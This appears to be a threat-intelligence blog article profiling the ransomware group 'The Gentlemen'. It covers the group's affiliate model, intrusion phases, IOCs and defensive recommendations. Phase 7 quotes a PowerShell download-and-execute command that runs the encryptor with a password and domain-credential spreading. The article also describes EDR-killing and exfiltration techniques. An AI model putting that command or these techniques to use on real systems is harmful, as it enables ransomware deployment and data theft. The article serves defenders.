What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

← Threat-Actor-Profile

0 sources verified·11 min read

By Lyrie Threat Intelligence·5/9/2026

The Gentlemen Arrive: Inside 2026's Most Dangerous New Ransomware Syndicate

TL;DR

A new ransomware-as-a-service operation calling itself The Gentlemen has exploded from obscurity to become the second most prolific ransomware group on the planet in under nine months. First observed in August 2025, the group has already claimed 340+ victims across 50+ countries spanning 22 industries. A Check Point DFIR investigation in early 2026 exposed their full intrusion chain — including Cobalt Strike staging, SystemBC SOCKS5 tunneling, vulnerable driver-based EDR killing, and a purpose-built ransomware encryptor with built-in network propagation. With an uncharacteristically generous 90/10 affiliate split, a strict CIS exclusion zone suggesting Russian-speaking origins, and a disproportionate targeting focus on Asia that no other major group has matched, The Gentlemen represent a paradigm shift in how RaaS operations can scale at speed. Their operational sophistication, multi-platform locker portfolio, and $0-friction dark-web affiliate onboarding make them one of the most significant new threat actors to emerge since LockBit 3.0.

Background: A Gentleman's Entrance Into the Criminal Elite

The ransomware threat landscape has historically been a slow-churn of established brands — LockBit, Cl0p, ALPHV/BlackCat, RansomHub — with new entrants struggling to differentiate. Then, in mid-to-late August 2025, a post appeared across multiple underground criminal forums promoting a new RaaS program under the name The Gentlemen. The pitch was blunt: 90% cut for affiliates, multi-platform lockers ready to deploy, EDR-killer tooling included, and a pre-built leak site infrastructure for victim pressure operations.

What followed was not typical. Most RaaS operations spend 12–18 months building an affiliate base before achieving meaningful attack volume. The Gentlemen moved from that forum post to 240+ confirmed victims within the first months of 2026 alone, reaching a total claim count north of 320–340 by April. BlackFog's Q1 2026 ransomware state report confirmed the group as responsible for 200 undisclosed attacks (9% of all undisclosed ransomware incidents tracked), making them the second most active group in the entire ecosystem behind Qilin.

The name carries deliberate branding. Ransomware operators increasingly understand that their "product" must attract technically skilled affiliates from a competitive marketplace. The genteel framing — their ransom notes, dark web portal, and even a X/Twitter presence — signals that the operators are sophisticated enough to understand that brand identity drives affiliate recruitment.

Organizational Structure: RaaS With Unusual Controls

The 90/10 Model — and Why It's Working

The standard RaaS revenue split in 2025–2026 typically runs 20–30% to the operator and 70–80% to affiliates. The Gentlemen inverted this dramatically: affiliates retain 90% of ransom proceeds, with operators keeping only 10%. This is not charity — it's market strategy. At 90%, even moderately skilled threat actors who couldn't negotiate better deals elsewhere flow toward The Gentlemen's program. FortiGuard Labs notes that the marketplace impact has been significant, though analyst1.com observed "mixed feedback" regarding whether the group actually runs a true RaaS or a tighter, small coordinated team conducting attacks directly. The operational discipline seen in DFIR analysis — consistent tooling, structured lateral movement, standardized staging paths — supports the hypothesis that a core team hands operationalized playbooks to vetted affiliates rather than offering an open-enrollment program.

The Data Escrow Condition

An unusually disciplined requirement separates The Gentlemen from peer RaaS groups: affiliates must exfiltrate victim data before requesting a ransomware binary. Operators verify the exfiltration before providing the customized encryptor. In cases where exfiltration is genuinely impossible, affiliates must submit a written justification and a refundable deposit returned only upon confirmed ransom receipt. This is operationally significant — it guarantees the group retains leverage for double extortion even if the victim recovers from encryption, and it ensures affiliates who might otherwise encrypt-and-run cannot abandon the data theft component.

CIS Exclusion and Attribution Indicators

The group explicitly prohibits affiliates from targeting organizations in Russia and Commonwealth of Independent States (CIS) countries. This is a recognized operational pattern among Russian-speaking cybercriminal groups dating back to REvil and Conti — it both avoids domestic law enforcement attention and reflects cultural alignment. Analyst1's attribution assessment is moderate-confidence: Russian-speaking Eastern European origin, consistent with the established RaaS ecosystem.

Technical Analysis: Inside a Gentlemen Intrusion

Check Point Research published the most detailed DFIR timeline on a Gentlemen-affiliate attack to date. The following synthesis covers the full kill chain.

Phase 1: Initial Access — FortiGate VPN as the Door of Choice

S-RM Intelligence analysis across multiple Gentlemen cases confirms that FortiGate VPN is the overwhelmingly preferred initial access vector. Observed methods include:

Credential brute-forcing on VPN portals where MFA is not enforced
Exploitation of public-facing vulnerabilities in Fortinet appliances (specific CVEs tied to their intrusion chain have not been fully published, but the pattern aligns with the ongoing series of FortiGate authentication bypass and SSL-VPN vulnerabilities disclosed in 2024–2025)
Initial Access Broker (IAB) purchases when direct exploitation is slower than procurement — the group maintains apparent relationships with IABs on underground forums, allowing rapid entry when a target is pre-compromised

Phase 2: Post-Compromise — Privileged Entry and Domain Recon

The first confirmed artifacts in the Check Point case show the attacker already operating at Domain Admin level on a Domain Controller — suggesting either VPN access with privileged credentials, or a rapid escalation from VPN to DC that was not captured in the telemetry. From that position, the attacker performed systematic network reachability testing: a recognizable pattern of failed network logons followed by successful authentications consistent with controlled credential validation sweeps.

Discovery toolkit mapped to FortiGuard data:

Advanced IP Scanner — fast host discovery
Nmap — port and service enumeration
Custom scripts for AD and account enumeration
cmd.exe /C systeminfo, whoami, dir c:\users — standard post-compromise fingerprinting
Native file reads against internal documentation (Chinese-language hostfile in the Check Point case indicates Asian target environment)

Phase 3: Lateral Movement — Cobalt Strike on Admin Shares

The attacker deployed Cobalt Strike beacons across the environment by writing random-named executables (<7-char-random>.exe) to administrative shares (\\HOST\ADMIN$\) and executing them via RPC. This is textbook Cobalt Strike lateral spread methodology, consistent with a mature affiliate using commercial offensive tooling rather than custom implants.

PowerShell was leveraged via scheduled tasks with execution policy bypass flags — a persistence-plus-propagation mechanism that allowed the Cobalt Strike C2 channel to survive reboots and user logoffs.

Active C2 Infrastructure (from DFIR analysis):

Cobalt Strike C2: 91.107.247[.]163 — ports 443 (primary) and 80 (fallback)

Phase 4: EDR Killing — ThrottleBlood.sys Vulnerable Driver

Before deploying the ransomware encryptor, affiliates leveraged Bring-Your-Own-Vulnerable-Driver (BYOVD) technique using ThrottleBlood.sys — a known vulnerable driver that, when loaded into kernel space, enables termination of security processes including EDR agents. This is a hardened, enterprise-grade anti-detection step that significantly elevates the group's sophistication tier beyond opportunistic ransomware operators. The systematic use of EDR killers before encryption explains the high success rate against environments with modern endpoint protection deployed.

Phase 5: SystemBC — Covert Tunneling and Botnet Infrastructure

The intrusion also included an attempt to deploy SystemBC (socks.exe), a proxy malware that establishes SOCKS5 tunneling via a custom RC4-encrypted protocol. SystemBC is favored in human-operated ransomware campaigns precisely because it:

Creates an encrypted tunnel for C2 traffic that evades DPI-based detection
Can download and execute additional payloads in-memory (fileless)
Masks lateral movement traffic within the victim network

In the Check Point case, endpoint protection blocked the SystemBC execution — but analysis of the SystemBC C2 server (45.86.230[.]112) revealed a botnet of 1,570+ active victims, predominantly corporate and organizational targets, with the United States, United Kingdom, and Germany leading by infection count. The relationship between this SystemBC infrastructure and The Gentlemen's core operation remains unclear: it may be affiliate tooling or an operator-maintained pre-positioning network.

SystemBC C2: 45.86.230[.]112

Phase 6: Data Exfiltration — Staging Before Encryption

Consistent with the operator requirement for confirmed exfiltration, affiliates stage stolen data at predictable local paths:

Staging directory: C:\ProgramData\data
Exfiltration protocol: WinSCP via SFTP or WebDAV to attacker-controlled infrastructure
Observed alternate method (May 2026): MSP360/CloudBerry Backup client rebranded as "Micro[...]" — a living-off-trusted-tools evasion technique using a legitimate cloud backup agent for exfiltration

Phase 7: Encryption — The grand.exe Propagator

The ransomware binary (grand.exe) is distributed from an internal staging server (often the compromised DC itself) via PowerShell download and execution:

powershell.exe -ExecutionPolicy Bypass -command 
(new-object net.webclient).downloadfile(
  'http://[INTERNAL-DC]:8080/grand.exe', 
  'c:\programdata\r.exe'); 
c:\programdata\r.exe --password VvO8EtUh --spread [DOMAIN]\[USER]:[PASS]

The --spread flag with domain credentials enables self-propagating execution across the environment without needing to re-push the binary from the attacker's own infrastructure — a clean lateral detonation mechanism that reduces dwell-time artifacts. The --password argument controls execution authentication, preventing casual detonation by defenders who recover the binary.

Locker portfolio:

Windows, Linux, NAS, BSD: Go-based multi-OS locker
ESXi: C-based dedicated hypervisor locker (maximum VMware infrastructure impact)
Features marketed to affiliates: self-deletion, log wiping, concurrent execution

IOCs / Indicators of Compromise

| Indicator | Type | Context |

|---|---|---|

| 91.107.247[.]163 | IP | Cobalt Strike C2 (ports 443, 80) |

| 45.86.230[.]112 | IP | SystemBC C2 (1,570+ victim botnet) |

| ThrottleBlood.sys | Driver filename | BYOVD EDR killer |

| socks.exe | Filename | SystemBC proxy malware |

| grand.exe → c:\programdata\r.exe | Filename | Ransomware encryptor (The Gentlemen) |

| C:\ProgramData\data\ | Path | Staging directory for exfiltrated data |

| <random_7_char>.exe in ADMIN$ | Pattern | Cobalt Strike lateral deployment pattern |

| --password VvO8EtUh | CLI arg | Ransomware execution token (observed case) |

| FortiGate VPN portals (no MFA) | Attack surface | Primary initial access vector |

| AnyDesk (post-compromise) | Tool | Persistence / remote access |

| WinSCP + SFTP/WebDAV | Protocol | Data exfiltration channel |

| MSP360/CloudBerry rebranded "Micro*" | LOLBaS | Alternative exfil (May 2026 observed) |

Victimology: Asia at the Epicenter

The Gentlemen's targeting profile deviates from the North America–Europe axis that dominates most major ransomware group data. Asia accounts for nearly 46% of all known victims — an unprecedented concentration for a group of this size and scale. Within Asia, Thailand and Japan have recorded elevated hit rates alongside broader Southeast Asian exposure.

The United States remains the single highest-volume individual country by victim count (consistent with the global ransomware attack surface), but the Asia-Pacific weight signals either specialized affiliate recruitment in that region or deliberate market segmentation — possibly both.

Industry targeting spans energy, government, healthcare, manufacturing, construction, IT services, financial services, law firms, and real estate. Small-to-medium enterprises dominate the victim list over large enterprises — consistent with an affiliate model where mid-market targets yield faster payment cycles with less incident response resistance than Fortune 500 organizations.

Lyrie Take: Why The Gentlemen Are a Category-Level Threat

Most new RaaS groups flame out within 60 days. The Gentlemen did the opposite — they accelerated. There are several structural reasons why this group is different:

1. The 90% split changed affiliate economics. By offering a margin that larger, established RaaS operations cannot match without cannibalizing operator revenue, The Gentlemen captured experienced affiliates who brought existing access, established toolchains, and proven techniques. The group essentially weaponized the RaaS labor market.

2. The data escrow model eliminates the single-pay leverage problem. By requiring confirmed exfiltration before issuing the encryptor, operators guarantee double-extortion leverage on every single attack. Groups that allow affiliates to encrypt without exfiltrating lose their leverage the moment victims restore from backup.

3. ESXi targeting in C. The decision to build the ESXi locker in C rather than porting the Go locker demonstrates deliberate engineering choices for platform-specific optimization. ESXi ransomware is the most high-value single execution in enterprise environments — encrypting one hypervisor can take down dozens of VMs simultaneously.

4. Asia focus is a deliberate white space. The APAC region has historically been underserved by major ransomware IR vendors compared to North America and Europe. Lower public disclosure rates, less mature regulatory reporting requirements in some markets, and different enterprise security maturity profiles make it a favorable hunting ground for rapid affiliate-driven scaling.

5. The Twitter/X account is a new escalation tool. Operating a public social media presence for victim shaming — not just a dark web leak site — moves the pressure campaign into the open internet where target organizations cannot contain information flow. This is an escalation above Cl0p's leak-site model toward full public reputational warfare.

Defender Playbook: Hardening Against The Gentlemen

Immediate Priority (72 hours):

☑ Audit FortiGate VPN MFA coverage — The Gentlemen's primary door. Every VPN portal without enforced MFA is a potential entry point. Enable MFA on all administrator and remote-access accounts today.
☑ Patch FortiGate SSL-VPN appliances — Apply all outstanding Fortinet security advisories. The group actively exploits vulnerable public-facing infrastructure.
☑ Hunt for ThrottleBlood.sys — Query endpoint telemetry for any unsigned or suspicious kernel driver loads. This BYOVD artifact is a clear pre-ransomware indicator.
☑ Block 45.86.230[.]112 and 91.107.247[.]163 at perimeter firewall/NGFW. These C2 nodes are live and actively used.

Short-Term Hardening (1–2 weeks):

☑ Monitor administrative share writes — Cobalt Strike lateral spread via ADMIN$ and C$ writes of random-named executables is detectable with EDR rules on svchost.exe spawning remote executables. Tune alerting on this pattern.
☑ Restrict WinSCP, MSP360/CloudBerry, AnyDesk to authorized users with approval workflows. These legitimate tools are primary exfiltration and persistence vectors in Gentlemen attacks.
☑ LSASS protection — Enable Credential Guard and LSASS process protection to slow credential dumping, which is the precondition for Gentlemen's lateral movement with PsExec.
☑ Segment Active Directory from internet-adjacent systems — The pattern of achieving DC-level access quickly after VPN entry suggests insufficient AD tier segmentation.

Strategic Defense:

☑ Implement network egress controls for SFTP/WebDAV to non-approved hosts. Gentlemen exfiltrate to attacker-controlled SFTP servers — an egress allowlist would contain this at the data-loss stage even if the attacker achieves network presence.
☑ Review cloud backup agent deployments — The MSP360/CloudBerry rebranding technique (May 2026) demonstrates the group's willingness to weaponize trusted backup channels. Audit all installed backup agents against approved software lists.
☑ Dark web monitoring — The group maintains a public leak site and X/Twitter account. Lyrie's dark web intelligence module provides pre-publication monitoring to detect organizational data staging before public disclosure.

Sources

1. Check Point Research — "DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy" (May 2026) — https://research.checkpoint.com/2026/dfir-report-the-gentlemen/

2. FortiGuard Labs — "The Gentlemen Ransomware Threat Actor Profile" (May 2026) — https://www.fortiguard.com/threat-actor/6387/the-gentlemen-ransomware

3. S-RM Intelligence — "Ransomware in Focus: Meet The Gentleman" (May 2026) — https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-the-gentleman

4. BlackFog / Industrial Cyber — "The State of Ransomware Q1 2026" (May 2026) — https://industrialcyber.co/ransomware/ransomware-activity-holds-steady-in-q1-2026-as-threat-actors-prioritise-data-theft-over-disruption-blackfog-finds/

Lyrie.ai Cyber Research Division — Senior Analyst Desk